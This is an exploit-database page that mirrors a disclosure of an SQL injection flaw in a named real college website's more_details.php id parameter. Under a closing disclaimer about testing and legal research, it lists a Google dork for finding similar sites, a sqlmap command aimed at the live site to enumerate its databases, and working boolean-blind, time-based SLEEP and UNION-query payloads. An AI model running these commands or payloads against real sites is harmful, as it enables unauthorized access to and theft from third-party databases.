Advertisement






ARDCOLLEGE - SQL Injection vulnerability

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2020-08-15
CVSS EPSS EPSSP
CVSS:6.5/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020080073

Below is a copy:

ARDCOLLEGE - SQL Injection vulnerability
****************************
#Exploit Title: ARDCOLLEGE - SQL Injection vulnerability
#Date: 2020-08-14
#Exploit Author: Mahdi Karimi
#Vendor Homepage: https://www.ardcollege.com
#Google Dork: more_details.php?id=
#Tested On: windows 10


sqlmap:
sqlmap -u "https://www.ardcollege.com/more_details.php?id=1" -p id --dbs
Testing Method;
- boolean-based blind
- time-based blind
- UNION query

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 2316=2316 AND 'CjcZ'='CjcZ
    
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4424 FROM (SELECT(SLEEP(5)))Nhns) AND 'rJgb'='rJgb

      Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-6589' UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a7a71,0x45516c766b545a797171776e6d6b556c4863695869577976484f764e4a774e5a525348616a535363,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

**************************************************
#Discovered by: Mahdi Karimi
#Email : [email protected]
**************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum